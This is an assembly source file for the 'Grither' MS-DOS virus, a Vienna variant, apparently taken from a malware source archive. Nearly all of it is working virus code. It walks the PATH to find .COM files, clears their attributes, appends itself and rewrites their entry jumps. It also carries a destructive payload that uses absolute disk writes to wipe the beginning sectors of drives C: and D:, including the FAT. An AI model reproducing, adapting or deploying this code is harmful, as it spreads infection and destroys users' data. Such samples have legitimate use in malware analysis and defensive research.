MalwareSourceCode/MSDOS/G-Index/Virus.MSDOS.Unknown.grither.asm

;**************************************************************************
;**                          GRITHER VIRUS                               **
;**      Created: 27 Oct 1990                                            **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on  **
;**               *.COMs and will re-write the begining sectors of drive **
;**               C: & D:! Erasing the FATs area...                      **
;**                                                                      **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer!    **
;**								         **
;**************************************************************************

data_1e		equ	2Ch			; (65AC:002C=0)
data_2e		equ	75h			; (65AC:0075=0)
data_3e		equ	79h			; (65AC:0079=0)

seg_a		segment	byte public
		assume	cs:seg_a, ds:seg_a


		org	100h

grither		proc	far

start:
;*		jmp	short loc_1		;*(0112)
		db	0EBh, 10h
		db	90h
data_5		db	'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q<EFBFBD>', 9, 3, '<27><><EFBFBD><EFBFBD><EFBFBD>'	; Data table (indexed access)
		db	0Ah, 0
		db	0BFh, 0, 1, 0B9h, 3, 0
		db	0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
		db	0CDh, 21h, 3Ch, 0, 75h, 3
		db	0E9h, 0C5h, 1
loc_2:
		push	es
		mov	ah,2Fh			; '/'
		int	21h			; DOS Services  ah=function 2Fh
						;  get DTA ptr into es:bx
		mov	[si+0],bx
		nop				;*Fixup for MASM (M)
		mov	[si+2],es
		nop				;*Fixup for MASM (M)
		pop	es
		mov	dx,5Fh
		nop
		add	dx,si
		mov	ah,1Ah
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA to ds:dx
		push	es
		push	si
		mov	es,ds:data_1e		; (65AC:002C=0)
		mov	di,0
loc_3:
		pop	si
		push	si
		add	si,1Ah
		nop				;*Fixup for MASM (M)
		lodsb				; String [si] to al
		mov	cx,8000h
		repne	scasb			; Rep zf=0+cx >0 Scan es:[di] for al
		mov	cx,4
  
locloop_4:
		lodsb				; String [si] to al
		scasb				; Scan es:[di] for al
		jnz	loc_3			; Jump if not zero
		loop	locloop_4		; Loop if cx > 0
  
		pop	si
		pop	es
		mov	[si+16h],di
		nop				;*Fixup for MASM (M)
		mov	di,si
		nop
		add	di,1Fh
		nop				;*Fixup for MASM (M)
		mov	bx,si
		add	si,1Fh
		nop				;*Fixup for MASM (M)
		mov	di,si
		jmp	short loc_10		; (01B9)
loc_5:
		cmp	word ptr [si+16h],0
		nop				;*Fixup for MASM (M)
		jne	loc_6			; Jump if not equal
		jmp	loc_19			; (02E9)
loc_6:
		push	ds
		push	si
		mov	ds,es:data_1e		; (65AC:002C=0)
		mov	di,si
		mov	si,es:[di+16h]
		nop				;*Fixup for MASM (M)
		add	di,1Fh
		nop				;*Fixup for MASM (M)
loc_7:
		lodsb				; String [si] to al
		cmp	al,3Bh			; ';'
		je	loc_9			; Jump if equal
		cmp	al,0
		je	loc_8			; Jump if equal
		stosb				; Store al to es:[di]
		jmp	short loc_7		; (019B)
loc_8:
		mov	si,0
loc_9:
		pop	bx
		pop	ds
		mov	[bx+16h],si
		nop				;*Fixup for MASM (M)
		nop
		cmp	ch,5Ch			; '\'
		je	loc_10			; Jump if equal
		mov	al,5Ch			; '\'
		stosb				; Store al to es:[di]
loc_10:
		mov	[bx+18h],di
		nop				;*Fixup for MASM (M)
		mov	si,bx
		add	si,10h
		nop				;*Fixup for MASM (M)
		mov	cx,6
		rep	movsb			; Rep when cx >0 Mov [si] to es:[di]
		mov	si,bx
		mov	ah,4Eh			; 'N'
		mov	dx,1Fh
		nop
		add	dx,si
		mov	cx,3
		int	21h			; DOS Services  ah=function 4Eh
						;  find 1st filenam match @ds:dx
		jmp	short loc_12		; (01DD)
loc_11:
		mov	ah,4Fh			; 'O'
		int	21h			; DOS Services  ah=function 4Fh
						;  find next filename match
loc_12:
		jnc	loc_13			; Jump if carry=0
		jmp	short loc_5		; (017F)
loc_13:
		mov	ax,ds:data_2e[si]	; (65AC:0075=0)
		and	al,1Fh
		cmp	al,1Fh
		je	loc_11			; Jump if equal
		cmp	word ptr ds:data_3e[si],0FA00h	; (65AC:0079=0)
		ja	loc_11			; Jump if above
		cmp	word ptr ds:data_3e[si],0Ah	; (65AC:0079=0)
		jb	loc_11			; Jump if below
		mov	di,[si+18h]
		nop				;*Fixup for MASM (M)
		push	si
		add	si,7Dh
		nop				;*Fixup for MASM (M)
loc_14:
		lodsb				; String [si] to al
		stosb				; Store al to es:[di]
		cmp	al,0
		jne	loc_14			; Jump if not equal
		pop	si
		mov	ax,4300h
		mov	dx,1Fh
		nop
		add	dx,si
		int	21h			; DOS Services  ah=function 43h
						;  get/set file attrb, nam@ds:dx
		mov	[si+8],cx
		nop				;*Fixup for MASM (M)
		mov	ax,4301h
		and	cx,0FFFEh
		mov	dx,1Fh
		nop
		add	dx,si
		int	21h			; DOS Services  ah=function 43h
						;  get/set file attrb, nam@ds:dx
		mov	ax,3D02h
		mov	dx,1Fh
		nop
		add	dx,si
		int	21h			; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		jnc	loc_15			; Jump if carry=0
		jmp	loc_18			; (02DA)
loc_15:
		mov	bx,ax
		mov	ax,5700h
		int	21h			; DOS Services  ah=function 57h
						;  get/set file date & time
		mov	[si+4],cx
		nop				;*Fixup for MASM (M)
		mov	[si+6],dx
		nop				;*Fixup for MASM (M)
		mov	ah,2Ch			; ','
		int	21h			; DOS Services  ah=function 2Ch
						;  get time, cx=hrs/min, dh=sec
		and	dh,7
		jnz	loc_16			; Jump if not zero
		mov	ah,40h			; '@'
		mov	cx,85h
		mov	dx,si
		add	dx,8Ah
		int	21h			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
		jmp	short loc_17		; (02C3)
		db	90h
loc_16:
		mov	ah,3Fh			; '?'
		mov	cx,3
		mov	dx,0Ah
		nop
		add	dx,si
		int	21h			; DOS Services  ah=function 3Fh
						;  read file, cx=bytes, to ds:dx
		jc	loc_17			; Jump if carry Set
		cmp	ax,3
		jne	loc_17			; Jump if not equal
		mov	ax,4202h
		mov	cx,0
		mov	dx,0
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, cx,dx=offset
		jc	loc_17			; Jump if carry Set
		mov	cx,ax
		sub	ax,3
		mov	[si+0Eh],ax
		nop				;*Fixup for MASM (M)
		add	cx,2F7h
		mov	di,si
		sub	di,1F5h
		mov	[di],cx
		mov	ah,40h			; '@'
		mov	cx,306h
		mov	dx,si
		sub	dx,1F7h
		int	21h			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
		jc	loc_17			; Jump if carry Set
		cmp	ax,306h
		jne	loc_17			; Jump if not equal
		mov	ax,4200h
		mov	cx,0
		mov	dx,0
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, cx,dx=offset
		jc	loc_17			; Jump if carry Set
		mov	ah,40h			; '@'
		mov	cx,3
		mov	dx,si
		add	dx,0Dh
		nop				;*Fixup for MASM (M)
		int	21h			; DOS Services  ah=function 40h
						;  write file cx=bytes, to ds:dx
loc_17:
		mov	dx,[si+6]
		nop				;*Fixup for MASM (M)
		mov	cx,[si+4]
		nop				;*Fixup for MASM (M)
		and	cx,0FFE0h
		or	cx,1Fh
		mov	ax,5701h
		int	21h			; DOS Services  ah=function 57h
						;  get/set file date & time
		mov	ah,3Eh			; '>'
		int	21h			; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
loc_18:
		mov	ax,4301h
		mov	cx,[si+8]
		nop				;*Fixup for MASM (M)
		mov	dx,1Fh
		nop
		add	dx,si
		int	21h			; DOS Services  ah=function 43h
						;  get/set file attrb, nam@ds:dx
loc_19:
		push	ds
		mov	ah,1Ah
		mov	dx,[si+0]
		nop				;*Fixup for MASM (M)
		mov	ds,[si+2]
		nop				;*Fixup for MASM (M)
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA to ds:dx
		pop	ds
loc_20:
		pop	cx
		xor	ax,ax			; Zero register
		xor	bx,bx			; Zero register
		xor	dx,dx			; Zero register
		xor	si,si			; Zero register
		mov	di,100h
		push	di
		xor	di,di			; Zero register
		retn	0FFFFh
		db	10 dup (0)
		db	0CDh, 20h, 90h, 0E9h, 0, 0
		db	2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
		db	0, 0, 0, 0, 50h, 41h
		db	54h, 48h, 3Dh, 0, 0
		db	105 dup (0)
		db	0EBh, 58h, 90h
		db	' `7O `88@99@6r `65@85M%AACC%YMJ%'
		db	'LWNYMJW%AACC% `:@86@95r `68@87MH'
		db	'tzwyjx~%tk%Jqj}nts `5r$'
		db	'3'
		db	0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
		db	0A0h, 0, 33h, 0D2h, 0BBh, 0
		db	0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
		cmp	byte ptr data_5[bx],24h	; (65AC:0103=90h) '$'
		je	loc_22			; Jump if equal
		sub	byte ptr data_5[bx],5	; (65AC:0103=90h)
		inc	bx
		jmp	short loc_21		; (0400)
loc_22:
		mov	dx,offset data_5	; (65AC:0103=90h)
		mov	ah,9
		int	21h			; DOS Services  ah=function 09h
						;  display char string at ds:dx
		int	20h			; Program Terminate
  
grither		endp
  
seg_a		ends
  
  
  
		end	start